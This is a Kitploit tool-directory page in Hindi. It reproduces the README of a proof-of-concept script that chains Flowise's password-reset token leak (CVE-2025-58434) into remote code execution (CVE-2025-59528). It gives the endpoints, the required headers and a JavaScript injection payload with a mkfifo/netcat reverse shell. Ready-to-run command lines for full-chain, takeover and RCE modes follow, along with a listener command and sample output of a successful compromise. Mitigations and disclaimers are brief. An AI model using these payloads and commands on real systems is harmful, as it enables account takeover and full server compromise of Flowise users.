Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-58434-AND-59528-POC — CVE-2025-28434 और CVE-2025-59528 के लिए संयुक्त PoC | Kitploit
उपकरण/GitHubGitHub/kartik2005221/cve-2025-58434-and-59528-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरणलर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
kartik2005221/cve-2025-58434-and-59528-poc

CVE-2025-58434-AND-59528-POC

CVE-2025-28434 और CVE-2025-59528 के लिए संयुक्त PoC

रिपॉजिटरी देखें
194 महीने पहलेअभी तक समीक्षित नहीं

Flowise डुअल CVE PoC — CVE-2025-58434 + CVE-2025-59528

CVE-1 CVE-2 CVSS Python License

⚠️ केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान के लिए।
इस टूल को उन सिस्टमों के विरुद्ध चलाना जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास लिखित अनुमति नहीं है, अवैध है।


विषय-सूची

  • अवलोकन
  • कमजोरियों का विवरण
    • CVE-2025-58434 — खाता अधिग्रहण
    • CVE-2025-59528 — रिमोट कोड निष्पादन
  • संपूर्ण आक्रमण श्रृंखला
  • प्रभावित संस्करण
  • रिपॉजिटरी संरचना
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
    • डिफ़ॉल्ट व्यवहार
    • सहायता स्क्रीन
    • चेन मोड
    • मॉड्यूल — ATO
    • मॉड्यूल — लॉगिन
    • मॉड्यूल — RCE
  • फ्लैग संदर्भ
  • रिवर्स शेल बनाम कस्टम कमांड
  • उदाहरण आउटपुट
  • उपाय
  • प्रकटीकरण समयरेखा
  • संदर्भ
  • अस्वीकरण

अवलोकन

यह रिपॉजिटरी Flowise में पाई गई दो गंभीर कमजोरियों को एक एकल, मॉड्यूलर PoC टूल में संयोजित करती है।

दोनों कमजोरियाँ स्वाभाविक रूप से श्रृंखलाबद्ध होती हैं: CVE-2025-58434 बिना प्रमाणीकरण के खाता अधिग्रहण प्रदान करती है, जो CVE-2025-59528 की प्रमाणीकरण आवश्यकता को पूरा करती है — एक ही स्वचालित रन में बिना प्रमाणीकरण के RCE प्राप्त करती है।


कमजोरियों का विवरण

CVE-2025-58434 — खाता अधिग्रहण

मूल कारण: forgot-password एंडपॉइंट पासवर्ड रीसेट टोकन (tempToken) को केवल ईमेल के माध्यम से भेजने के बजाय सीधे HTTP प्रतिक्रिया बॉडी में लौटाता है।

आक्रमण चरण:

  1. किसी भी पंजीकृत ईमेल के साथ POST /api/v1/account/forgot-password
  2. JSON प्रतिक्रिया से tempToken पढ़ें — ईमेल एक्सेस की आवश्यकता नहीं
  3. लीक हुए टोकन के साथ POST /api/v1/account/reset-password → नया पासवर्ड सेट करें
  4. पीड़ित के रूप में लॉगिन करें

लीक हुई प्रतिक्रिया (संक्षिप्त):

root@kitploit:~
{
  "user": {
    "email": "[email protected]",
    "tempToken": "LEAKED_TOKEN_HERE",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

CVE-2025-59528 — रिमोट कोड निष्पादन

मूल कारण: CustomMCP नोड उपयोगकर्ता द्वारा प्रदत्त mcpServerConfig को बिना किसी सैनिटाइज़ेशन के सीधे JavaScript के Function() कंस्ट्रक्टर में पास करता है। चूँकि Flowise Node.js पर चलता है, इंजेक्ट किया गया कोड child_process, fs, और सभी Node.js बिल्ट-इन तक पूर्ण पहुँच रखता है।

कमजोर कोड पथ:

root@kitploit:~
POST /api/v1/node-load-method/customMCP
  -> convertToValidJSONString()
    -> Function('return ' + mcpServerConfig)()   ← unsanitized user input

आवश्यक हेडर:

root@kitploit:~
Content-Type:   application/json
x-request-from: internal
Cookie:         token=<jwt>; refreshToken=<jwt>; connect.sid=<sid>

डिफ़ॉल्ट इंजेक्शन पेलोड (रिवर्स शेल):

root@kitploit:~
{
  "loadMethod": "listActions",
  "inputs": {
    "mcpServerConfig": "({x:(function(){const cp=process.mainModule.require(\"child_process\");cp.exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc LHOST LPORT >/tmp/f\");return \"shell_fired\";})()})"
  }
}

नोट: रिवर्स शेल पेलोड cp.exec() (एसिंक्रोनस / फायर-एंड-फॉरगेट) का उपयोग करते हैं, जिससे HTTP अनुरोध तुरंत लौट आता है और टूल टाइमआउट नहीं करता। सामान्य कमांड cp.execSync() का उपयोग करते हैं और आउटपुट इनलाइन लौटाते हैं।


संपूर्ण आक्रमण श्रृंखला

root@kitploit:~
Attacker                              Flowise API
   │                                      │
   │  [CVE-2025-58434]                    │
   │  POST /forgot-password {email}       │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  201 { tempToken: "abc..." }         │  ← token leaked in response
   │                                      │
   │  POST /reset-password                │
   │  {email, tempToken, newPassword}     │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  201 OK (tempToken cleared)          │  ← ATO complete
   │                                      │
   │  [CVE-2025-59528]                    │
   │  POST /auth/login {email, newPass}   │
   │─────────────────────────────────────►│
   │◄─────────────────────────────────────│
   │  200 OK + Set-Cookie: token=...      │  ← cookies extracted
   │                                      │
   │  POST /node-load-method/customMCP    │
   │  {mcpServerConfig: <js-revshell>}    │
   │─────────────────────────────────────►│
   │                              [exec() fires in background]
   │◄─────────────────────────────────────│
   │  200 {"shell_fired"}                 │
   │                                      │
   Attacker's nc listener ←─────────────── Server connects back
   ✓  Full RCE from zero credentials

प्रभावित संस्करण

घटकस्थिति
Flowise क्लाउड (cloud.flowiseai.com)CVE-2025-58434 से प्रभावित
Flowise स्व-होस्टेड (पैच से पहले के सभी संस्करण)दोनों CVE से प्रभावित

पैच किए गए रिलीज़ नंबरों के लिए आधिकारिक Flowise सुरक्षा सलाह देखें।


रिपॉजिटरी संरचना

root@kitploit:~
flowise-dual-cve-poc/
├── flowise_poc.py      # Main PoC — all modules + chain mode
├── requirements.txt    # Python dependencies
├── README.md           # This file
└── DISCLAIMER.md       # Full legal notice

आवश्यकताएँ

  • Python 3.7+
  • requests लाइब्रेरी

स्थापना

root@kitploit:~
git clone https://github.com/yourhandle/flowise-dual-cve-poc
cd flowise-dual-cve-poc
pip install -r requirements.txt

उपयोग

डिफ़ॉल्ट व्यवहार

किसी मोड फ्लैग की आवश्यकता नहीं है। यदि आप स्क्रिप्ट को --chain या --module के बिना चलाते हैं, तो यह स्वचालित रूप से पूर्ण चेन मोड में चलती है। डिफ़ॉल्ट RCE पेलोड एक रिवर्स शेल है — बस --lhost और --lport प्रदान करें।

root@kitploit:~
# Minimal invocation — full chain + reverse shell
python3 flowise_poc.py \
  -u http://flowise.example.com \
  -e [email protected] \
  --lhost 10.10.16.35 \
  --lport 4444

चलाने से पहले अपना लिसनर प्रारंभ करें:

root@kitploit:~
nc -lvnp 4444

सहायता स्क्रीन

root@kitploit:~
python3 flowise_poc.py -h

चेन मोड

सभी चार चरणों को एंड-टू-एंड चलाता है: टोकन लीक करें → पासवर्ड रीसेट करें → लॉगिन करें → RCE।

root@kitploit:~
# Reverse shell (default payload)
python3 flowise_poc.py --chain \
  -u http://flowise.example.com \
  -e [email protected] \
  --lhost 10.10.16.35 --lport 4444

# Custom command instead of reverse shell
python3 flowise_poc.py --chain \
  -u http://flowise.example.com \
  -e [email protected] \
  -c "cat /etc/passwd"

# Custom ATO password + reverse shell
python3 flowise_poc.py --chain \
  -u http://flowise.example.com \
  -e [email protected] \
  -p "MyCustomPass1!" \
  --lhost 10.10.16.35 --lport 9001

मॉड्यूल — ATO

tempToken लीक करें और खाते का पासवर्ड रीसेट करें। लॉगिन/RCE से पहले रुक जाता है।

root@kitploit:~
# Default new password
python3 flowise_poc.py --module ato \
  -u http://flowise.example.com \
  -e [email protected]

# Custom new password
python3 flowise_poc.py --module ato \
  -u http://flowise.example.com \
  -e [email protected] \
  -p "NewPassword2025!"

# Print raw JSON response
python3 flowise_poc.py --module ato \
  -u http://flowise.example.com \
  -e [email protected] --json-output

मॉड्यूल — लॉगिन

प्रमाणित करें और मैन्युअल उपयोग के लिए तीन सत्र कुकीज़ निकालें।

root@kitploit:~
python3 flowise_poc.py --module login \
  -u http://flowise.example.com \
  -e [email protected] \
  -P "password123"

# JSON output for scripting
python3 flowise_poc.py --module login \
  -u http://flowise.example.com \
  -e [email protected] \
  -P "password123" --json-output

मॉड्यूल — RCE

सर्वर पर निष्पादित करें। यदि --token नहीं दिया गया है तो स्वतः लॉगिन करता है।

root@kitploit:~
# Reverse shell — auto-login
python3 flowise_poc.py --module rce \
  -u http://flowise.example.com \
  -e [email protected] -P "password123" \
  --lhost 10.10.16.35 --lport 4444

# Custom command — auto-login
python3 flowise_poc.py --module rce \
  -u http://flowise.example.com \
  -e [email protected] -P "password123" \
  -c "id"

# Manual token — reverse shell
python3 flowise_poc.py --module rce \
  -u http://flowise.example.com \
  --token "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..." \
  --lhost 10.10.16.35 --lport 4444

# All three cookies manually
python3 flowise_poc.py --module rce \
  -u http://flowise.example.com \
  --token "eyJhbGci..." \
  --refresh-token "eyJhbGci..." \
  --connect-sid "s%3A4rey2nuk..." \
  -c "ls /root"

फ्लैग संदर्भ

मोड (सभी वैकल्पिक — डिफ़ॉल्ट --chain है)

फ्लैगविवरण
--chainपूर्ण श्रृंखला: ATO → लॉगिन → RCE
--module atoकेवल खाता अधिग्रहण
--module login

लक्ष्य

फ्लैगशॉर्टविवरणआवश्यक
--url-uFlowise इंस्टेंस का बेस URL

ATO विकल्प

फ्लैगशॉर्टविवरणडिफ़ॉल्ट
--new-password-pATO के बाद पीड़ित खाते पर सेट किया गया पासवर्डFlowise@Pwn3d2025!

प्रमाणीकरण विकल्प

RCE विकल्प

विविध

फ्लैगशॉर्टविवरणडिफ़ॉल्ट

रिवर्स शेल बनाम कस्टम कमांड

स्क्रिप्ट स्वचालित रूप से सही निष्पादन मोड चुनती है:

एसिंक्रोनस निष्पादन का अर्थ है कि HTTP अनुरोध तुरंत पूरा हो जाता है — रिवर्स शेल पेलोड पर कोई टाइमआउट त्रुटि नहीं होती।


उदाहरण आउटपुट

root@kitploit:~
  [Step 1] [CVE-2025-58434] Requesting forgot-password token ...
  [*] HTTP 201
  ────────────────────────────────────────────────────────────────────
    LEAKED ACCOUNT DATA
  ────────────────────────────────────────────────────────────────────
  tempToken     : 28HYxS1UFqalMGMKVQeEdapifG0Mo...
  tokenExpiry   : 2026-04-13T05:14:17.621Z
  ────────────────────────────────────────────────────────────────────
  [+] VULNERABLE — token disclosed without authentication!

  [Step 2] [CVE-2025-58434] Resetting password → Flowise@Pwn3d2025!
  [*] HTTP 201
  [+] Password reset SUCCESSFUL (tempToken cleared)
  [+] Account takeover complete → [email protected] / Flowise@Pwn3d2025!

  [Step 3] [Auth] Logging in to extract session cookies ...
  [*] HTTP 200
  ────────────────────────────────────────────────────────────────────
    EXTRACTED SESSION COOKIES
  ────────────────────────────────────────────────────────────────────
  token           : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  refreshToken    : eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
  connect_sid     : s%3AGIjQFOoMQOpwioeZdmlruKL6VSQ1cePu...
  ────────────────────────────────────────────────────────────────────

  [Step 4] [CVE-2025-59528] Executing RCE via CustomMCP ...
  [*] HTTP 200
  ────────────────────────────────────────────────────────────────────
    RCE RESULT
  ────────────────────────────────────────────────────────────────────
  Mode    : Reverse Shell
  LHOST   : 10.10.16.35
  LPORT   : 4444
  [+] Reverse shell payload fired!
  [!] Waiting for connection on 10.10.16.35:4444 ...
  [!] Make sure your listener is running: nc -lvnp 4444
  ────────────────────────────────────────────────────────────────────
  [+] CHAIN COMPLETE

उपाय

CVE-2025-58434 के लिए

  • API प्रतिक्रियाओं में टोकन कभी न लौटाएँ। tempToken को केवल पंजीकृत ईमेल के माध्यम से भेजें।
  • ईमेल मौजूद है या नहीं, इसकी परवाह किए बिना एक सामान्य सफलता संदेश लौटाएँ (एन्यूमरेशन रोकता है)।
  • टोकन को एकल-उपयोग, अल्पकालिक (≤15 मिनट), और अनुरोध संदर्भ से जुड़ा बनाएँ।
  • forgot-password एंडपॉइंट पर रेट-लिमिट लागू करें।

CVE-2025-59528 के लिए

  • उपयोगकर्ता इनपुट को Function(), eval(), या vm.runInThisContext() में कभी न पास करें।
  • mcpServerConfig को केवल डेटा के रूप में पार्स करें (जैसे, JSON.parse()) — इसे कभी निष्पादित न करें।
  • यदि डायनामिक मूल्यांकन आवश्यक है, तो प्रतिबंधित संदर्भ वाले एक पृथक सैंडबॉक्स का उपयोग करें।
  • सख्त इनपुट सत्यापन और अनुमत कॉन्फ़िगरेशन कुंजियों की एक अलाउलिस्ट लागू करें।

सामान्य

  • क्लाउड और स्व-होस्टेड दोनों डिप्लॉयमेंट को पैच करें।
  • पासवर्ड रीसेट और node-load-method एंडपॉइंट पर लॉगिंग और अलर्टिंग सक्षम करें।
  • सभी एडमिन खातों के लिए MFA पर विचार करें।

प्रकटीकरण समयरेखा

दिनांकघटना
2025-08-19CVE-2025-58434 खोजा गया और रिपोर्ट किया गया
TBDCVE-2025-59528 खोजा गया और रिपोर्ट किया गया
TBD

संदर्भ

  • GHSA-wgpv-6j63-x5ph — CVE-2025-58434
  • GHSA-3gcm-f6qx-ff7p — CVE-2025-59528
  • Flowise GitHub
  • CWE-640: कमजोर पासवर्ड पुनर्प्राप्ति तंत्र
  • CWE-94: कोड निर्माण का अनुचित नियंत्रण

अस्वीकरण

केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए।
पूर्ण कानूनी सूचना के लिए DISCLAIMER.md देखें।

टूल डाउनलोड करें
CVE-2025-58434CVE-2025-59528
प्रकारखाता अधिग्रहणरिमोट कोड निष्पादन
प्रमाणीकरण आवश्यकनहींहाँ (कोई भी मान्य खाता)
CVSS9.8 गंभीरगंभीर
प्रभावितक्लाउड + स्व-होस्टेडस्व-होस्टेड
केवल लॉगिन और कुकीज़ निकालना
--module rceकेवल RCE
हमेशा
--email-eलक्ष्य / लॉगिन ईमेलहमेशा
फ्लैगशॉर्टविवरण
--login-password-Pलॉगिन मॉड्यूल / RCE ऑटो-लॉगिन के लिए पासवर्ड
--token—मैन्युअल रूप से token कुकी प्रदान करें (लॉगिन छोड़ देता है)
--refresh-token—मैन्युअल रूप से refreshToken कुकी प्रदान करें
--connect-sid—मैन्युअल रूप से connect.sid कुकी प्रदान करें
फ्लैगशॉर्टविवरणडिफ़ॉल्ट
--lhost—रिवर्स शेल के लिए आक्रमणकर्ता IP—
--lport—रिवर्स शेल के लिए आक्रमणकर्ता पोर्ट—
--command-cकस्टम OS कमांड (रिवर्स शेल को ओवरराइड करता है)id यदि lhost/lport नहीं दिया गया
--timeout-tHTTP टाइमआउट (सेकंड)15
--json-output-jकच्ची JSON प्रतिक्रियाएँ प्रिंट करेंfalse
परिदृश्यउपयोग किया गया पेलोडHTTP व्यवहार
--lhost + --lport (-c के बिना)mkfifo netcat वन-लाइनरcp.exec() — एसिंक्रोनस, तुरंत लौटता है
-c "..." जिसमें nc/mkfifo/bash -i होरिवर्स शेल के रूप में पहचाना गयाcp.exec() — एसिंक्रोनस, तुरंत लौटता है
-c "id" या कोई अन्य सामान्य कमांडउपयोगकर्ता कमांडcp.execSync() — ब्लॉक करता है, आउटपुट लौटाता है
न तो -c, न --lhostidcp.execSync() — ब्लॉक करता है, आउटपुट लौटाता है
विक्रेता द्वारा स्वीकृति
TBDपैच जारी किया गया
TBDसार्वजनिक प्रकटीकरण